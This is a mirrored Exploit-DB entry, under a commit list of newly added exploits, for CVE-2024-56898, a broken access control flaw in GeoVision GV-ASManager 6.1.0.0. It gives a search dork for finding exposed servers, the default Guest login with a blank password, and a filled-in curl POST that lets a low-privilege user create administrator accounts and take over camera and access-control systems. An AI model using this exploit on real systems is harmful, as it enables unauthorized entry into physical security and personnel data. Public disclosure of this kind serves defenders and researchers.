bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52189.txt
Exploit-DB b165516b1b DB: 2025-04-12 
26 changes to exploits/shellcodes/ghdb

ABB Cylon Aspect 3.08.02 - PHP Session Fixation
ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery
ABB Cylon FLXeon 9.3.4 - Default Credentials
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)
ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning

Netman 204 - Remote command without authentication

qBittorrent 5.0.1 - MITM RCE

CMU CERT/CC VINCE 2.0.6 - Stored XSS

CyberPanel 2.3.6 - Remote Code Execution (RCE)
GeoVision GV-ASManager 6.1.0.0 - Broken Access Control
GeoVision GV-ASManager 6.1.1.0 - CSRF

MagnusSolution magnusbilling 7.3.0 - Command Injection

Nagios Log Server 2024R1.3.1 - API Key Exposure

WebFileSys 2.31.0 - Directory Path Traversal

flatCore 1.5 - Cross Site Request Forgery (CSRF)

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

MiniCMS 1.1 - Cross Site Scripting (XSS)

NEWS-BUZZ News Management System 1.0 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
2025-04-12 00:16:31 +00:00

47 lines
No EOL
3 KiB
Text
Raw Blame History

# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898
Broken access control vulnerability in Geovision GV-ASManager web application with version v6.1.0.0 or less.
Requirements
To perform successful attack an attacker requires:
- GeoVision ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (there are cases when there are public access)
- Access to Guest account (enabled by default), or any low privilege account (Username: Guest; Password: <blank>)
Impact
The vulnerability can be leveraged to perform the following unauthorized actions:
A low privilege account which isn't authorized to manage accounts is able to:
- Enable and disable any account.
- Create new accounts.
- Modify privileges of any account.
- Listing accounts and their information.
After the escalation of the privileges, an attacker will be able to:
- Access the resources such as monitoring cameras, access cards, parking cars, employees and visitors, etc.
- Make changes in data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras, access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform CVE-2024-56902 attack to retrieve cleartext password that can be reused in other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb - Access & Security Management
- TAWeb - Time and Attendance Management
- VMWeb - Visitor Management
- ASManager - Access & Security Management software in OS
Reference in a new issue View git blame Copy permalink